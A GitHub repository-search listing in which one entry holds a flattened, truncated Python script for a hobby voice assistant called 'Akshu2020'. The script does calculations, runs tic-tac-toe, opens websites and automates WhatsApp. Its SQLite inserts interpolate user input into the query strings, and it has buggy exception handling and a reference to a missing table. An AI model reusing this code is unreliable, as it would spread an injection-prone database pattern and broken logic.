Found 38 repositories(showing 30)
AUK9527
No description available
wukongdaily
这是一个工作流。同步各位大佬项目里最新编译的ipk文件 生成适用于iStoreOS/ImmortalWrt用的run自解压包
unbyte
你还好🐎
Rynkll696
import pyttsx3 import speech_recognition as sr import datetime from datetime import date import calendar import time import math import wikipedia import webbrowser import os import smtplib import winsound import pyautogui import cv2 from pygame import mixer from tkinter import * import tkinter.messagebox as message from sqlite3 import * conn = connect("voice_assistant_asked_questions.db") conn.execute("CREATE TABLE IF NOT EXISTS `voicedata`(id INTEGER PRIMARY KEY AUTOINCREMENT,command VARCHAR(201))") conn.execute("CREATE TABLE IF NOT EXISTS `review`(id INTEGER PRIMARY KEY AUTOINCREMENT, review VARCHAR(50), type_of_review VARCHAR(50))") conn.execute("CREATE TABLE IF NOT EXISTS `emoji`(id INTEGER PRIMARY KEY AUTOINCREMENT,emoji VARCHAR(201))") global query engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) def speak(audio): engine.say(audio) engine.runAndWait() def wishMe(): hour = int(datetime.datetime.now().hour) if hour >= 0 and hour<12: speak("Good Morning!") elif hour >= 12 and hour < 18: speak("Good Afternoon!") else: speak("Good Evening!") speak("I am voice assistant Akshu2020 Sir. Please tell me how may I help you.") def takeCommand(): global query r = sr.Recognizer() with sr.Microphone() as source: print("Listening...") r.pause_threshold = 0.9 audio = r.listen(source) try: print("Recognizing...") query = r.recognize_google(audio,language='en-in') print(f"User said: {query}\n") except Exception as e: #print(e) print("Say that again please...") #speak('Say that again please...') return "None" return query def calculator(): global query try: if 'add' in query or 'edi' in query: speak('Enter a number') a = float(input("Enter a number:")) speak('Enter another number to add') b = float(input("Enter another number to add:")) c = a+b print(f"{a} + {b} = {c}") speak(f'The addition of {a} and {b} is {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'sub' in query: speak('Enter a number') a = float(input("Enter a number:")) speak('Enter another number to subtract') b = float(input("Enter another number to subtract:")) c = a-b print(f"{a} - {b} = {c}") speak(f'The subtraction of {a} and {b} is {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'mod' in query: speak('Enter a number') a = float(input("Enter a number:")) speak('Enter another number') b = float(input("Enter another number:")) c = a%b print(f"{a} % {b} = {c}") speak(f'The modular division of {a} and {b} is equal to {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'div' in query: speak('Enter a number as dividend') a = float(input("Enter a number:")) speak('Enter another number as divisor') b = float(input("Enter another number as divisor:")) c = a/b print(f"{a} / {b} = {c}") speak(f'{a} divided by {b} is equal to {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'multi' in query: speak('Enter a number') a = float(input("Enter a number:")) speak('Enter another number to multiply') b = float(input("Enter another number to multiply:")) c = a*b print(f"{a} x {b} = {c}") speak(f'The multiplication of {a} and {b} is {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'square root' in query: speak('Enter a number to find its sqare root') a = float(input("Enter a number:")) c = a**(1/2) print(f"Square root of {a} = {c}") speak(f'Square root of {a} is {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'square' in query: speak('Enter a number to find its sqare') a = float(input("Enter a number:")) c = a**2 print(f"{a} x {a} = {c}") speak(f'Square of {a} is {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'cube root' in query: speak('Enter a number to find its cube root') a = float(input("Enter a number:")) c = a**(1/3) print(f"Cube root of {a} = {c}") speak(f'Cube root of {a} is {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'cube' in query: speak('Enter a number to find its sqare') a = float(input("Enter a number:")) c = a**3 print(f"{a} x {a} x {a} = {c}") speak(f'Cube of {a} is {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'fact' in query: try: n = int(input('Enter the number whose factorial you want to find:')) fact = 1 for i in range(1,n+1): fact = fact*i print(f"{n}! = {fact}") speak(f'{n} factorial is equal to {fact}. Your answer is {fact}.') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') except Exception as e: #print(e) speak('I unable to calculate its factorial.') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'power' in query or 'raise' in query: speak('Enter a number whose power you want to raised') a = float(input("Enter a number whose power to be raised :")) speak(f'Enter a raised power to {a}') b = float(input(f"Enter a raised power to {a}:")) c = a**b print(f"{a} ^ {b} = {c}") speak(f'{a} raise to the power {b} = {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'percent' in query: speak('Enter a number whose percentage you want to calculate') a = float(input("Enter a number whose percentage you want to calculate :")) speak(f'How many percent of {a} you want to calculate?') b = float(input(f"Enter how many percentage of {a} you want to calculate:")) c = (a*b)/100 print(f"{b} % of {a} is {c}") speak(f'{b} percent of {a} is {c}. Your answer is {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'interest' in query: speak('Enter the principal value or amount') p = float(input("Enter the principal value (P):")) speak('Enter the rate of interest per year') r = float(input("Enter the rate of interest per year (%):")) speak('Enter the time in months') t = int(input("Enter the time (in months):")) interest = (p*r*t)/1200 sint = round(interest) fv = round(p + interest) print(f"Interest = {interest}") print(f"The total amount accured, principal plus interest, from simple interest on a principal of {p} at a rate of {r}% per year for {t} months is {p + interest}.") speak(f'interest is {sint}. The total amount accured, principal plus interest, from simple interest on a principal of {p} at a rate of {r}% per year for {t} months is {fv}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'si' in query: speak('Enter the angle in degree to find its sine value') a = float(input("Enter the angle:")) b = a * 3.14/180 c = math.sin(b) speak('Here is your answer.') print(f"sin({a}) = {c}") speak(f'sin({a}) = {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'cos' in query: speak('Enter the angle in degree to find its cosine value') a = float(input("Enter the angle:")) b = a * 3.14/180 c = math.cos(b) speak('Here is your answer.') print(f"cos({a}) = {c}") speak(f'cos({a}) = {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'cot' in query or 'court' in query: try: speak('Enter the angle in degree to find its cotangent value') a = float(input("Enter the angle:")) b = a * 3.14/180 c = 1/math.tan(b) speak('Here is your answer.') print(f"cot({a}) = {c}") speak(f'cot({a}) = {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') except Exception as e: print("infinity") speak('Answer is infinity') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'tan' in query or '10' in query: speak('Enter the angle in degree to find its tangent value') a = float(input("Enter the angle:")) b = a * 3.14/180 c = math.tan(b) speak('Here is your answer.') print(f"tan({a}) = {c}") speak(f'tan({a}) = {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'cosec' in query: try: speak('Enter the angle in degree to find its cosecant value') a = float(input("Enter the angle:")) b = a * 3.14/180 c =1/ math.sin(b) speak('Here is your answer.') print(f"cosec({a}) = {c}") speak(f'cosec({a}) = {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') except Exception as e: print('Infinity') speak('Answer is infinity') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'caus' in query: try: speak('Enter the angle in degree to find its cosecant value') a = float(input("Enter the angle:")) b = a * 3.14/180 c =1/ math.sin(b) speak('Here is your answer.') print(f"cosec({a}) = {c}") speak(f'cosec({a}) = {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') except Exception as e: print('Infinity') speak('Answer is infinity') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') elif 'sec' in query: try: speak('Enter the angle in degree to find its secant value') a = int(input("Enter the angle:")) b = a * 3.14/180 c = 1/math.cos(b) speak('Here is your answer.') print(f"sec({a}) = {c}") speak(f'sec({a}) = {c}') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') except Exception as e: print('Infinity') speak('Answer is infinity') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') except Exception as e: speak('I unable to do this calculation.') speak('Do you want to do another calculation?') query = takeCommand().lower() if 'y' in query: speak('ok which calculation you want to do?') query = takeCommand().lower() calculator() else: speak('ok') def callback(r,c): global player if player == 'X' and states[r][c] == 0 and stop_game == False: b[r][c].configure(text='X',fg='blue', bg='white') states[r][c] = 'X' player = 'O' if player == 'O' and states[r][c] == 0 and stop_game == False: b[r][c].configure(text='O',fg='red', bg='yellow') states[r][c] = 'O' player = 'X' check_for_winner() def check_for_winner(): global stop_game global root for i in range(3): if states[i][0] == states[i][1]== states[i][2]!=0: b[i][0].config(bg='grey') b[i][1].config(bg='grey') b[i][2].config(bg='grey') stop_game = True root.destroy() for i in range(3): if states[0][i] == states[1][i] == states[2][i]!= 0: b[0][i].config(bg='grey') b[1][i].config(bg='grey') b[2][i].config(bg='grey') stop_game = True root.destroy() if states[0][0] == states[1][1]== states[2][2]!= 0: b[0][0].config(bg='grey') b[1][1].config(bg='grey') b[2][2].config(bg='grey') stop_game = True root.destroy() if states[2][0] == states[1][1] == states[0][2]!= 0: b[2][0].config(bg='grey') b[1][1].config(bg='grey') b[0][2].config(bg='grey') stop_game = True root.destroy() def sendEmail(to,content): server = smtplib.SMTP('smtp.gmail.com', 587) server.ehlo() server.starttls() server.login('xyz123@gmail.com','password') server.sendmail('xyz123@gmail.com',to,content) server.close() def brightness(): try: query = takeCommand().lower() if '25' in query: pyautogui.moveTo(1880,1050) pyautogui.click() time.sleep(1) pyautogui.moveTo(1610,960) pyautogui.click() pyautogui.moveTo(1880,1050) pyautogui.click() speak('If you again want to change brihtness, say, change brightness') elif '50' in query: pyautogui.moveTo(1880,1050) pyautogui.click() time.sleep(1) pyautogui.moveTo(1684,960) pyautogui.click() pyautogui.moveTo(1880,1050) pyautogui.click() speak('If you again want to change brihtness, say, change brightness') elif '75' in query: pyautogui.moveTo(1880,1050) pyautogui.click() time.sleep(1) pyautogui.moveTo(1758,960) pyautogui.click() pyautogui.moveTo(1880,1050) pyautogui.click() speak('If you again want to change brihtness, say, change brightness') elif '100' in query or 'full' in query: pyautogui.moveTo(1880,1050) pyautogui.click() time.sleep(1) pyautogui.moveTo(1835,960) pyautogui.click() pyautogui.moveTo(1880,1050) pyautogui.click() speak('If you again want to change brihtness, say, change brightness') else: speak('Please select 25, 50, 75 or 100....... Say again.') brightness() except exception as e: #print(e) speak('Something went wrong') def close_window(): try: if 'y' in query: pyautogui.moveTo(1885,10) pyautogui.click() else: speak('ok') pyautogui.moveTo(1000,500) except exception as e: #print(e) speak('error') def whatsapp(): query = takeCommand().lower() if 'y' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('whatsapp') time.sleep(2) pyautogui.press('enter') time.sleep(2) pyautogui.moveTo(100,140) pyautogui.click() speak('To whom you want to send message,.....just write the name here in 5 seconds') time.sleep(7) pyautogui.moveTo(120,300) pyautogui.click() time.sleep(1) pyautogui.moveTo(800,990) pyautogui.click() speak('Say the message,....or if you want to send anything else,...say send document, or say send emoji') query = takeCommand() if ('sent' in query or 'send' in query) and 'document' in query: pyautogui.moveTo(660,990) pyautogui.click() time.sleep(1) pyautogui.moveTo(660,740) pyautogui.click() speak('please select the document within 10 seconds') time.sleep(12) speak('Should I send this document?') query = takeCommand().lower() if 'y' in query and 'no' not in query: speak('sending the document......') pyautogui.press('enter') speak('Do you want to send message again to anyone?') whatsapp() elif ('remove' in query or 'cancel' in query or 'delete' in query or 'clear' in query) and ('document' in query or 'message' in query or 'it' in query or 'emoji' in query or 'select' in query): pyautogui.doubleClick(x=800, y=990) pyautogui.press('backspace') speak('Do you want to send message again to anyone?') whatsapp() else: speak('ok') elif ('sent' in query or 'send' in query) and 'emoji' in query: pyautogui.moveTo(620,990) pyautogui.click() pyautogui.moveTo(670,990) pyautogui.click() pyautogui.moveTo(650,580) pyautogui.click() speak('please select the emoji within 10 seconds') time.sleep(11) speak('Should I send this emoji?') query = takeCommand().lower() if 'y' in query and 'no' not in query: speak('Sending the emoji......') pyautogui.press('enter') speak('Do you want to send message again to anyone?') whatsapp() elif ('remove' in query or 'cancel' in query or 'delete' in query or 'clear' in query) and ('message' in query or 'it' in query or 'emoji' in query or 'select' in query): pyautogui.doublClick(x=800, y=990) speak('Do you want to send message again to anyone?') whatsapp() else: speak('ok') else: pyautogui.write(f'{query}') speak('Should I send this message?') query = takeCommand().lower() if 'y' in query and 'no' not in query: speak('sending the message......') pyautogui.press('enter') speak('Do you want to send message again to anyone?') whatsapp() elif ('remove' in query or 'cancel' in query or 'delete' in query or 'clear' in query) and ('message' in query or 'it' in query or 'select' in query): pyautogui.doubleClick(x=800, y=990) pyautogui.press('backspace') speak('Do you want to send message again to anyone?') whatsapp() else: speak('ok') else: speak('ok') def alarm(): root = Tk() root.title('Akshu2020 Alarm-Clock') speak('Please enter the time in the format hour, minutes and seconds. When the alarm should rang?') speak('Please enter the time greater than the current time') def setalarm(): alarmtime = f"{hrs.get()}:{mins.get()}:{secs.get()}" print(alarmtime) if(alarmtime!="::"): alarmclock(alarmtime) else: speak('You have not entered the time.') def alarmclock(alarmtime): while True: time.sleep(1) time_now=datetime.datetime.now().strftime("%H:%M:%S") print(time_now) if time_now == alarmtime: Wakeup=Label(root, font = ('arial', 20, 'bold'), text="Wake up! Wake up! Wake up",bg="DodgerBlue2",fg="white").grid(row=6,columnspan=3) speak("Wake up, Wake up") print("Wake up!") mixer.init() mixer.music.load(r'C:\Users\Admin\Music\Playlists\wake-up-will-you-446.mp3') mixer.music.play() break speak('you can click on close icon to close the alarm window.') hrs=StringVar() mins=StringVar() secs=StringVar() greet=Label(root, font = ('arial', 20, 'bold'),text="Take a short nap!").grid(row=1,columnspan=3) hrbtn=Entry(root,textvariable=hrs,width=5,font =('arial', 20, 'bold')) hrbtn.grid(row=2,column=1) minbtn=Entry(root,textvariable=mins, width=5,font = ('arial', 20, 'bold')).grid(row=2,column=2) secbtn=Entry(root,textvariable=secs, width=5,font = ('arial', 20, 'bold')).grid(row=2,column=3) setbtn=Button(root,text="set alarm",command=setalarm,bg="DodgerBlue2", fg="white",font = ('arial', 20, 'bold')).grid(row=4,columnspan=3) timeleft = Label(root,font=('arial', 20, 'bold')) timeleft.grid() mainloop() def select1(): global vs global root3 global type_of_review if vs.get() == 1: message.showinfo(" ","Thank you for your review!!") review = "Very Satisfied" type_of_review = "Positive" root3.destroy() elif vs.get() == 2: message.showinfo(" ","Thank you for your review!!") review = "Satisfied" type_of_review = "Positive" root3.destroy() elif vs.get() == 3: message.showinfo(" ","Thank you for your review!!!!") review = "Neither Satisfied Nor Dissatisfied" type_of_review = "Neutral" root3.destroy() elif vs.get() == 4: message.showinfo(" ","Thank you for your review!!") review = "Dissatisfied" type_of_review = "Negative" root3.destroy() elif vs.get() == 5: message.showinfo(" ","Thank you for your review!!") review = "Very Dissatisfied" type_of_review = "Negative" root3.destroy() elif vs.get() == 6: message.showinfo(" "," Ok ") review = "I do not want to give review" type_of_review = "No review" root3.destroy() try: conn.execute(f"INSERT INTO `review`(review,type_of_review) VALUES('{review}', '{type_of_review}')") conn.commit() except Exception as e: pass def select_review(): global root3 global vs global type_of_review root3 = Tk() root3.title("Select an option") vs = IntVar() string = "Are you satisfied with my performance?" msgbox = Message(root3,text=string) msgbox.config(bg="lightgreen",font = "(20)") msgbox.grid(row=0,column=0) rs1=Radiobutton(root3,text="Very Satisfied",font="(20)",value=1,variable=vs).grid(row=1,column=0,sticky=W) rs2=Radiobutton(root3,text="Satisfied",font="(20)",value=2,variable=vs).grid(row=2,column=0,sticky=W) rs3=Radiobutton(root3,text="Neither Satisfied Nor Dissatisfied",font="(20)",value=3,variable=vs).grid(row=3,column=0,sticky=W) rs4=Radiobutton(root3,text="Dissatisfied",font="(20)",value=4,variable=vs).grid(row=4,column=0,sticky=W) rs5=Radiobutton(root3,text="Very Dissatisfied",font="(20)",value=5,variable=vs).grid(row=5,column=0,sticky=W) rs6=Radiobutton(root3,text="I don't want to give review",font="(20)",value=6,variable=vs).grid(row=6,column=0,sticky=W) bs = Button(root3,text="Submit",font="(20)",activebackground="yellow",activeforeground="green",command=select1) bs.grid(row=7,columnspan=2) root3.mainloop() while True : query = takeCommand().lower() # logic for executing tasks based on query if 'wikipedia' in query: speak('Searching wikipedia...') query = query.replace("wikipedia","") results = wikipedia.summary(query, sentences=2) speak("According to Wikipedia") print(results) speak(results) elif 'translat' in query or ('let' in query and 'translat' in query and 'open' in query): webbrowser.open('https://translate.google.co.in') time.sleep(10) elif 'open map' in query or ('let' in query and 'map' in query and 'open' in query): webbrowser.open('https://www.google.com/maps') time.sleep(10) elif ('open' in query and 'youtube' in query) or ('let' in query and 'youtube' in query and 'open' in query): webbrowser.open('https://www.youtube.com') time.sleep(10) elif 'chrome' in query: webbrowser.open('https://www.chrome.com') time.sleep(10) elif 'weather' in query: webbrowser.open('https://www.yahoo.com/news/weather') time.sleep(3) speak('Click on, change location, and enter the city , whose whether conditions you want to know.') time.sleep(10) elif 'google map' in query: webbrowser.open('https://www.google.com/maps') time.sleep(10) elif ('open' in query and 'google' in query) or ('let' in query and 'google' in query and 'open' in query): webbrowser.open('google.com') time.sleep(10) elif ('open' in query and 'stack' in query and 'overflow' in query) or ('let' in query and 'stack' in query and 'overflow' in query and 'open' in query): webbrowser.open('stackoverflow.com') time.sleep(10) elif 'open v i' in query or 'open vi' in query or 'open vierp' in query or ('open' in query and ('r p' in query or 'rp' in query)): webbrowser.open('https://www.vierp.in/login/erplogin') time.sleep(10) elif 'news' in query: webbrowser.open('https://www.bbc.com/news/world') time.sleep(10) elif 'online shop' in query or (('can' in query or 'want' in query or 'do' in query or 'could' in query) and 'shop' in query) or('let' in query and 'shop' in query): speak('From which online shopping website, you want to shop? Amazon, flipkart, snapdeal or naaptol?') query = takeCommand().lower() if 'amazon' in query: webbrowser.open('https://www.amazon.com') time.sleep(10) elif 'flip' in query: webbrowser.open('https://www.flipkart.com') time.sleep(10) elif 'snap' in query: webbrowser.open('https://www.snapdeal.com') time.sleep(10) elif 'na' in query: webbrowser.open('https://www.naaptol.com') time.sleep(10) else: speak('Sorry sir, you have to search in browser as his shopping website is not reachable for me.') elif ('online' in query and ('game' in query or 'gaming' in query)): webbrowser.open('https://www.agame.com/games') time.sleep(10) elif 'dictionary' in query: webbrowser.open('https://www.dictionary.com') time.sleep(3) speak('Enter the word, in the search bar of the dictionary, whose defination or synonyms you want to know') time.sleep(3) elif ('identif' in query and 'emoji' in query) or ('sentiment' in query and ('analysis' in query or 'identif' in query)): speak('Please enter only one emoji at a time.') emoji = input('enter emoji here: ') if '😀' in emoji or '😃' in emoji or '😄' in emoji or '😁' in emoji or '🙂' in emoji or '😊' in emoji or '☺️' in emoji or '😇' in emoji or '🥲' in emoji: speak('happy') print('Happy') elif '😝' in emoji or '😆' in emoji or '😂' in emoji or '🤣' in emoji: speak('Laughing') print('Laughing') elif '😡' in emoji or '😠' in emoji or '🤬' in emoji: speak('Angry') print('Angry') elif '🤫' in emoji: speak('Keep quite') print('Keep quite') elif '😷' in emoji: speak('face with mask') print('Face with mask') elif '🥳' in emoji: speak('party') print('party') elif '😢' in emoji or '😥' in emoji or '😓' in emoji or '😰' in emoji or '☹️' in emoji or '🙁' in emoji or '😟' in emoji or '😔' in emoji or '😞️' in emoji: speak('Sad') print('Sad') elif '😭' in emoji: speak('Crying') print('Crying') elif '😋' in emoji: speak('Tasty') print('Tasty') elif '🤨' in emoji: speak('Doubt') print('Doubt') elif '😴' in emoji: speak('Sleeping') print('Sleeping') elif '🥱' in emoji: speak('feeling sleepy') print('feeling sleepy') elif '😍' in emoji or '🥰' in emoji or '😘' in emoji: speak('Lovely') print('Lovely') elif '😱' in emoji: speak('Horrible') print('Horrible') elif '🎂' in emoji: speak('Cake') print('Cake') elif '🍫' in emoji: speak('Cadbury') print('Cadbury') elif '🇮🇳' in emoji: speak('Indian national flag,.....Teeranga') print('Indian national flag - Tiranga') elif '💐' in emoji: speak('Bouquet') print('Bouquet') elif '🥺' in emoji: speak('Emotional') print('Emotional') elif ' ' in emoji or '' in emoji: speak(f'{emoji}') else: speak("I don't know about this emoji") print("I don't know about this emoji") try: conn.execute(f"INSERT INTO `emoji`(emoji) VALUES('{emoji}')") conn.commit() except Exception as e: #print('Error in storing emoji in database') pass elif 'time' in query: strTime = datetime.datetime.now().strftime("%H:%M:%S") print(strTime) speak(f"Sir, the time is {strTime}") elif 'open' in query and 'sublime' in query: path = "C:\Program Files\Sublime Text 3\sublime_text.exe" os.startfile(path) elif 'image' in query: path = "C:\Program Files\Internet Explorer\images" os.startfile(path) elif 'quit' in query: speak('Ok, Thank you Sir.') said = False speak('Please give the review. It will help me to improve my performance.') select_review() elif 'exit' in query: speak('Ok, Thank you Sir.') said = False speak('Please give the review. It will help me to improve my performance.') select_review() elif 'stop' in query: speak('Ok, Thank you Sir.') said = False speak('Please give the review. It will help me to improve my performance.') select_review() elif 'shutdown' in query or 'shut down' in query: speak('Ok, Thank you Sir.') said = False speak('Please give the review. It will help me to improve my performance.') select_review() elif 'close you' in query: speak('Ok, Thank you Sir.') said = False speak('Please give the review. It will help me to improve my performance.') select_review() try: conn.execute(f"INSERT INTO `voice_assistant_review`(review, type_of_review) VALUES('{review}', '{type_of_review}')") conn.commit() except Exception as e: pass elif 'bye' in query: speak('Bye Sir') said = False speak('Please give the review. It will help me to improve my performance.') select_review() elif 'wait' in query or 'hold' in query: speak('for how many seconds or minutes I have to wait?') query = takeCommand().lower() if 'second' in query: query = query.replace("please","") query = query.replace("can","") query = query.replace("you","") query = query.replace("have","") query = query.replace("could","") query = query.replace("hold","") query = query.replace("one","1") query = query.replace("only","") query = query.replace("wait","") query = query.replace("for","") query = query.replace("the","") query = query.replace("just","") query = query.replace("seconds","") query = query.replace("second","") query = query.replace("on","") query = query.replace("a","") query = query.replace("to","") query = query.replace(" ","") #print(f'query:{query}') if query.isdigit() == True: #print('y') speak('Ok sir') query = int(query) time.sleep(query) speak('my waiting time is over') else: print('sorry sir. I unable to complete your request.') elif 'minute' in query: query = query.replace("please","") query = query.replace("can","") query = query.replace("you","") query = query.replace("have","") query = query.replace("could","") query = query.replace("hold","") query = query.replace("one","1") query = query.replace("only","") query = query.replace("on","") query = query.replace("wait","") query = query.replace("for","") query = query.replace("the","") query = query.replace("just","") query = query.replace("and","") query = query.replace("half","") query = query.replace("minutes","") query = query.replace("minute","") query = query.replace("a","") query = query.replace("to","") query = query.replace(" ","") #print(f'query:{query}') if query.isdigit() == True: #print('y') speak('ok sir') query = int(query) time.sleep(query*60) speak('my waiting time is over') else: print('sorry sir. I unable to complete your request.') elif 'play' in query and 'game' in query: speak('I have 3 games, tic tac toe game for two players,....mario, and dyno games for single player. Which one of these 3 games you want to play?') query = takeCommand().lower() if ('you' in query and 'play' in query and 'with' in query) and ('you' in query and 'play' in query and 'me' in query): speak('Sorry sir, I cannot play this game with you.') speak('Do you want to continue it?') query = takeCommand().lower() try: if 'y' in query or 'sure' in query: root = Tk() root.title("TIC TAC TOE (By Akshay Khare)") b = [ [0,0,0], [0,0,0], [0,0,0] ] states = [ [0,0,0], [0,0,0], [0,0,0] ] for i in range(3): for j in range(3): b[i][j] = Button(font = ("Arial",60),width = 4,bg = 'powder blue', command = lambda r=i, c=j: callback(r,c)) b[i][j].grid(row=i,column=j) player='X' stop_game = False mainloop() else: speak('ok sir') except Exception as e: #print(e) time.sleep(3) print('I am sorry sir. There is some problem in loading the game. So I cannot open it.') elif 'tic' in query or 'tac' in query: try: root = Tk() root.title("TIC TAC TOE (Rayen Kallel)") b = [ [0,0,0], [0,0,0], [0,0,0] ] states = [ [0,0,0], [0,0,0], [0,0,0] ] for i in range(3): for j in range(3): b[i][j] = Button(font = ("Arial",60),width = 4,bg = 'powder blue', command = lambda r=i, c=j: callback(r,c)) b[i][j].grid(row=i,column=j) player='X' stop_game = False mainloop() except Exception as e: #print(e) time.sleep(3) speak('I am sorry sir. There is some problem in loading the game. So I cannot open it.') elif 'mar' in query or 'mer' in query or 'my' in query: webbrowser.open('https://chromedino.com/mario/') time.sleep(2.5) speak('Enter upper arrow key to start the game.') time.sleep(20) elif 'di' in query or 'dy' in query: webbrowser.open('https://chromedino.com/') time.sleep(2.5) speak('Enter upper arrow key to start the game.') time.sleep(20) else: speak('ok sir') elif 'change' in query and 'you' in query and 'voice' in query: engine.setProperty('voice', voices[1].id) speak("Here's an example of one of my voices. Would you like to use this one?") query = takeCommand().lower() if 'y' in query or 'sure' in query or 'of course' in query: speak('Great. I will keep using this voice.') elif 'n' in query: speak('Ok. I am back to my other voice.') engine.setProperty('voice', voices[0].id) else: speak('Sorry, I am having trouble understanding. I am back to my other voice.') engine.setProperty('voice', voices[0].id) elif 'www.' in query and ('.com' in query or '.in' in query): webbrowser.open(query) time.sleep(10) elif '.com' in query or '.in' in query: webbrowser.open(query) time.sleep(10) elif 'getting bore' in query: speak('then speak with me for sometime') elif 'i bore' in query: speak('Then speak with me for sometime.') elif 'i am bore' in query: speak('Then speak with me for sometime.') elif 'calculat' in query: speak('Yes. Which kind of calculation you want to do? add, substract, divide, multiply or anything else.') query = takeCommand().lower() calculator() elif 'add' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif '+' in query: speak('If you want to do any mathematical calculation then give me a command to open calculator.') elif 'plus' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif 'subtrac' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif 'minus' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif 'multipl' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif ' x ' in query: speak('If you want to do any mathematical calculation then give me a command to open calculator.') elif 'slash' in query: speak('If you want to do any mathematical calculation then give me a command to open calculator.') elif '/' in query: speak('If you want to do any mathematical calculation then give me a command to open calculator.') elif 'divi' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif 'trigonometr' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif 'percent' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif '%' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif 'raise to ' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif 'simple interest' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif 'akshay' in query: speak('Mr. Rayen Kallel is my inventor. He is 14 years old and he is A STUDENT AT THE COLLEGE PILOTEE SFAX') elif 'your inventor' in query: speak('Mr. Rayen Kallel is my inventor') elif 'your creator' in query: speak('Mr. Rayen Kallel is my creator') elif 'invent you' in query: speak('Mr. Rayen Kallel invented me') elif 'create you' in query: speak('Mr. Rayen Kallel created me') elif 'how are you' in query: speak('I am fine Sir') elif 'write' in query and 'your' in query and 'name' in query: print('Akshu2020') pyautogui.write('Akshu2020') elif 'write' in query and ('I' in query or 'whatever' in query) and 'say' in query: speak('Ok sir I will write whatever you will say. Please put your cursor where I have to write.......Please Start speaking now sir.') query = takeCommand().lower() pyautogui.write(query) elif 'your name' in query: speak('My name is akshu2020') elif 'who are you' in query: speak('I am akshu2020') elif ('repeat' in query and ('word' in query or 'sentence' in query or 'line' in query) and ('say' in query or 'tell' in query)) or ('repeat' in query and 'after' in query and ('me' in query or 'my' in query)): speak('yes sir, I will repeat your words starting from now') query = takeCommand().lower() speak(query) time.sleep(1) speak("If you again want me to repeat something else, try saying, 'repeat after me' ") elif ('send' in query or 'sent' in query) and ('mail' in query or 'email' in query or 'gmail' in query): try: speak('Please enter the 